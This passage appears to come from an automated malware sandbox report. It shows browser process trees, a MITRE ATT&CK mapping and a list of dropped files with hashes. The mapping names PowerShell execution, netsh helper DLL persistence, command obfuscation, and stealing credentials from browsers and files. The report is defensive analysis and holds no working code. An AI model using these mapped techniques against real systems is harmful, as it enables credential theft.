  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3772,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:8
  2⤵
  PID:4820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5144,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5252,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:2
  2⤵
  PID:4396

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc735946f8,0x7ffc73594708,0x7ffc73594718
  2⤵
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1996 /prefetch:2
  2⤵
  PID:3892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  PID:2872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4256 /prefetch:1
  2⤵
  PID:184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:3180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:2532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,11543406867507101202,7206745944291215164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:1548

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3712

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
c46d79c409e29281793a0f673a6e9c04

SHA1
750631c5a5a5470cda884992132333ee97c0ea26

SHA256
8e7e60c78419d630f93032df0e3d9007628d562fb8a19c72a30e856d5e498620

SHA512
b0e178dbc8a245cf7b555a3f0730b17ce04378173576b5f610189c0663246ce783a1c67f704571f148ff0993066c6c82570bcbd166db10ccde93f5b583198f59

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
690c6d6544e1a398e3772f206acb98a2

SHA1
c1d6cfa296c302b1aa278b777a9a865e27769848

SHA256
3be9ec8095b4f8bbb4577b6c51b31d418f7bf31c8a5c49117eb6652a176c78e9

SHA512
9a63fdebe9f29ba31947c887255bfa0beb7e31c4e66ea5f234088ef0d282e82f54d42061dc517da14ce0e8b2e2535ecce1b390d827425bf28ea344099d033ded

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
b14a1dac027260088ff7e1436f9a9acd

SHA1
794f610321f6a1ed6cea1143c89a72c3c396a964

SHA256
7020600ce1b461040aa1a4ed401ee18037575e060a5bf50c00ad41b90079ae0d

SHA512
3bd3f6840be45d807227521b8f0cf43bb888854fb38a174e224e6d3ff96938394a6c3259d459f53a326c1cfc78577d84fc770e8508c98f14e8b5122de12f0162

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
188954a506dc880ec60accc1b92b0536

SHA1
47bf3d1fbec11c49187a66ef2f2b20ebca0bc5b2

SHA256
5341cc090ead0701bd4ec48258fc328c5b749c406c06b3629d2f0851f7b4277f

SHA512
535bcb4e66ed6f04b2a0991894cf082a43d330027a44806524a31d6f888f253ca37c3b9f94ec1fdcc1dd61bb1f6026fee533009b20b96c767dc090a60cdcb233

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
0af387d0bd1700f182c66551e884e6d9

SHA1
f4ce78bef923496ef367678f5f9a550a0599994b

SHA256
61f6d8a1238855c5729d8b37c0265e87cef268f8ae06f46e788e7bd22ba55e90

SHA512
544c9a344743f0de8b91764d8beb1a11fc20279752c6b29e707c456437124123cfaf9653d0fdd4894179c9e44fdd83eea080ddf193857ee9bd3d7d04f050e087

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0e742d188d708694745de599f2c1ae06

SHA1
3b0c2176b2c8047dac72013a1fd3304fff39aaba

SHA256
8ca423b280ca4a83425bc0aca7a1844d66e8960d4e71c42166847f983c9f1774

SHA512
dbf48dfb175c2ea04131c93d8579fcf63e76f866f4f0fdbd466a14e2b4abf65d68a0682d6204b2e5c2e5f9c8e4e40a8657b20443e52b12c8192ff65c4ef60e68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6176f26f779f35a8abae9d7eced89776

SHA1
2e8ac579746c90724af841e77c56cb83ca77c351

SHA256
ac8e47837e0a40d341dc08ea0d4ac8ba0a2552c361bb46cca7a7b59fafbc3e63

SHA512
842890e3c1bd5830e1c20eebc4addb64d10f8df61768a419c1da20c6f1ba0912d6e24acf538ad73646d7a16a40172e79064222ea29942df06e4302350aaf2678

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5cb977e4cf27ead8f493ea9ed6c05796

SHA1
68bdd407d1f89bb80285683dcdb2e68903f05f94

SHA256
56cf9099adfccb286f09895679a7c843d451cbc3000857f9f22c72d33b170bb1

SHA512
1498bd81338096e6e4ee50478038e85346f5d1240d5e1bc402fe2555c504a7ad0c8c1cb7b9f8d3a191f0ea3ffd9b28de122a29dc8b7becd1ccb5f0ce4866e9b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
008f091809e64ab42c81447980c9eebc

SHA1
3de6be1e54f60b2a430d6dc8a443b911021b2945

SHA256
7a80995a87a3633f7745dc074fcb786d3f89e56b48a13656abdcacf5939cdfc4

SHA512
d50f562a0ff7c71902f48011b8018e4f611edb9fc251682fe63bd108019cc3eeb0892fc745bedaa020ecb864855118c24c3712094079875e1d006f929c73c827

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
2665e7e6652474d432ff2a312dd83527

SHA1
98dafe12ccecfa355a81a574e807ef61bb162770

SHA256
8cd4aba0323ec928f5752192acf781664ec80ddd025c8edb405d4217b1c0b060

SHA512
c56b5e48b456b3873580f735adb2351c3792a382fe29fea5127ba9a541f1840fdb0c4a407ba139ebe676926e6eed4646df84fbcc480008d3822d8230c3784d0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
9e9526572d2536a3904e6cb790193211

SHA1
5e51e07f64b6536da2b643318b0e618e2cd3ea44

SHA256
f95530be6d05b0801d74bfd8e0a607db86ac53beb6ee17ea2d6264595dc03955

SHA512
7d727316fa735db024a551b1c3c39c3f3fd592ae4a2efb5ce450da66a42d8bffef6e54fcce311ce56aa45293bf00ae9100b3e3e73aee45f0dc6a9973e3733947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3cd8f1b9-d5d1-4896-bd3a-3314142aeff1.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
aca3421eadffc6737974e98355053680

SHA1
b4eefb8e9a7905190ff73bbfc767c24170fe92de

SHA256
18d7585f8ff0ca77eeea4851dba8962e66dfc3717dc27003da83492a3c1c294b

SHA512
c368e17fb970e2140f5bad5ca752e2b9cf2188fd9842c54bd5f605c3690a3f0b1303b28fbdd6ae55b7ad51ac8adaea9b641d4f99628b0e87d1129a6a97c419b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
599B

MD5
31b9e1693449eb33f6e8572796a1e73a

SHA1
44cb363058d353eb1a717486a2f9330f7e641b38

SHA256
f2af55a868dd9bdea38d23cfbba55709b49c2822a57e37ac428be599ecd06f23

SHA512
c8a9e9cf1f2acbe1d8d576a70ffc8cd1111c699da7253f16dfb4452449f82dd8a8856456187301af317f2cc0f2ffcbaa27b73c8416af9968561ac3752e088871

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
dfc67c3e22a190ea58171b1a3d402949

SHA1
8885e5ea9fd0568e36356e113307c5f5cfade25c

SHA256
9e739f7edacb3423907e43dc4472769c27060753b96263e817c171d816e1bd7d

SHA512
9f456ec31ef101d53dbb42b1dfc8dd5f2c19d3f7d6408849197908dc619fc9ff1002d1c0b4b36d6e8056fc1b311b9aee07ab463483486f162ed924388d5e3989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bd120cbc3306d44c2e38fd3354f8d913

SHA1
ee1bb6d7de2873dc0a71bda515a9d5b794f9b766

SHA256
27613a3592e24df5840584876a653bcab5b6dd477aec57b2c45292adc19238b4

SHA512
cfa464dea489e1e86558007b5b3fd50887328d4b4034572078dad6e3311d452c91f033057491a3011058ba1c59d5ade43a34fd1af59bc67a325b044362d84d55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
41151115278c3cb48dff000bea5538fc

SHA1
d899387db3f227c9d33648809916ae221716400d

SHA256
da632b2a807ecbe9fbd6a19b7c70f9620e4418fda6906143e0dd4a922b92ece2

SHA512
c95b7475c604bdf69a66b82cf89db927b2f0fcbb9d38b93215d9c1603642917d838f9025d796da74f9ddf19f95b0565eaa917dabbbbdf4d0a8a41cce6f13dd3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f1ab2abb3d0753390c3932131dfa4757

SHA1
2e6500bad4b1dcba4bdeac3457af94fb6f00291b

SHA256
476e384df17cb6d62b20fd5ac3811142f210324d09df62c8189aab634d3509a9

SHA512
9fa55a93d5e123cade72d7ffd179a23cb846e843376969f5fde9b1eddee202f5212c163f8c4800b5d39b263e494f112632f90e1cedc990fb7dcfbe771508416e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5da75924b097c993fdadd6105ac95afc

SHA1
adf57bf4e8b25c3b0f6d10824940aca90b4c2d5b

SHA256
624e2e7b83ef7f854b40994fab63efa8ec7f08eee2b3b81eb21e3b421268456d

SHA512
6eb235628cac4e4dbf60eae0bd398f9514f1ece8643f91cc73dc54e6b864ebe1f1f211954debb6c3e3c7810a4353152dd3a2563f6b4baeb8ede5bd04f4032f58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES96C2.tmp

Filesize
1KB

MD5
8016d16f63659ca2942f025051ab25c2

SHA1
d61c281b5b7f0fe1053dcb68d40d7bba003a8314

SHA256
